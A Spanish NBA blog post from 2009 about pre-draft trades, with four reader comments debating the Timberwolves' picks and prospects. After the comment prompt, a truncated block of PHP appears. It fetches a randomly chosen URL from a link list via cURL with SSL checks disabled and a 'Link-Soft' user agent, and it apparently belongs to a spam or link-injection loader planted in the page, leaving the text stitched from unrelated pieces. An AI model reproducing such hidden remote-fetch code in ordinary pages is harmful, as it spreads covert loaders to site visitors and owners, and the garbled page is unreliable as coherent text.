Trades pre Draft

24 de June de 2009 por telekoman

Los equipos siguien haciendo sus movimientos de cara al próximo draft y a la siguiente campaña. De esta forma, en las últimas fechas se han producido los siguientes movientos:

Milwaukee transpasa a una de sus estrellas, Richard Jefferson a los Spurs, lo que vuelve a meter a la franquicia tejana en serio aspirante al título (si es que alguna vez ha dejado de serlo). Los Bucks obtienen a cambio a Fabricio Oberto, Bruce Bowen y Kurt Thomas.  Buen intercambio para ambos a priori, ya que permite a Milwaukee algo más de margen salarial para la renovación de Villanueva y Sessions.

Después de esto, los Bucks han traspasado a Oberto a los Pistons a cambio de Amir Johnson. Con este trade Detroit obtiene un hombre alto a un coste inferior, aunque se rumorea que el argentino puede ser cortado. En ese caso la flexibilidad salarial de Detroit pasa a ser enorme si, como todo el mundo prevee, Iverson no es renovado. Con estas premisas, Detroit podría pujar tranquilamente por dos agentes libres de primer nivel.

Por otro lado, los Minnesota Timberwolves han transpasado a su base-escolta Randy Foye y al veterano Mike Miller a los Wizards a cambio de la 5ª elección del draft y 3 jugadores de poco nivel. Con esto los de Washington obtienen un equipo de mejor nivel, pero es posible que algunos de sus jugadores jovenes como Nick Young puedan ver algo frenada su progresión. Por parte de Minnesota es bastante seguro que intentarán hacer algún movimiento con las elecciones de primera ronda que acumulan, 4 en total, entre las que destacan la 5ª y la 6ª. Algunos posibles destinos de estas rondas serían las de cambiarlas por la 2ª de Memphis y así poder optar por Ricky Rubio o por Thabeet. Teniendo en cuenta que los Timberwolves poseen un juego interior bastante apañado en ataque con Al Jefferson y Kevin Love, lo más lógico sería intentar ir a por el español, aunque no es descartable que en lugar de traspasar 2 primeras rondas, traspasara una primera ronda y a Kevin Love por la segunda ronda e ir a por el tanzano. Esto les daría un juego interior poderoso tanto en ataque como en defensa. Veremos los movimientos.

Comenta

4 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Sería una locura un traspaso de Love+Primera Ronda por Thabet…. Love el año que viene puede dar un salto de calidad tremendo. El Kevin Love de hace un año en la NCAA daría un repaso al Thabet de este año. Yo si fuera los Wolves, teniendo la 5, 6, 18 y 28, escogeria a Tyreke Evans y Stephen Curry, de escolta y base titulares, y luego intentaria pescar en las otras rondas, a Bj Mullens, Hansbrough, Daye o Budinger.

    En Draftexpress situan ya a Ricky en la quinta posición de Wolves ¿?¿?¿?¿?¿

    Para Rubio sería jodido por el sueldo más bajo, pero yo sinceramente flipo con la idea de: RUBIO-EVANS-SAM YOUNG- LOVE- JEFFERSON ….. Sería el quintento con más potencial de la liga. Los Wolves siempre han sido una de mis franquicias preferidas despues de Portland.

      Citar

  2. TheDeerHunter dice:
    #2

    Para seguir con este ciclo de trades pre-draft hoy se ha confirmado el fichaje de Shaq por los Cavs. En el traspaso se incluye a Ben Wallace, Pavlovic, un pick de 2ª ronda y pasta. Previsible… y ya tenemos dos reforzados candidatos al anillo en dos días. No terminamos de ver hacia donde se mueven los Suns.

    Además, los Knicks han mandado a Crawford a los Hawks a cambio de Acie Law y el incombustible Speedy Claxton. Un gran movimiento para los Hawks, sin duda… no sé si resuelve las carencias de los Knicks para la posición de base.

    Por último, Mavs y Blazers intercambian posiciones en primera ronda.

    Del traspaso de Wizards-Wolves sólo añadir que los tres jugadores que llegan a los Wolves son Ethan Thomas, Songaila y Pecherov.

      Citar

  3. Viva_Dirk dice:
    #3

    Kantonyo ¿Sam Young? Si está recuperado supongo que la posición de alero será para Corey Brewer que es uno de los jugadores que mas estoy esperando que hagan su aparición en la liga.

    Que bien le vendría a Sam Young otro año en la uni, sobre todo porque no creo que ningun equipo vaya a darle muchos minutos.

      Citar

  4. Kantonyo dice:
    #4

    Sí, tienes razón Corey Brewer tambien tiene un potencial enorme, esperemos que la lesión no corte su proyección que ya demostró con Florida Gators, siendo bicampeón de la NCAA con Al Horford.

    No es que Sam Young sea de mis predilectos en este draft, pero si creo que puede ser de los jugadores que pueda aportar cosas desde el principio en una franquicia de perfil bajo. Es de los más veteranos y expertos de los que se presentan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>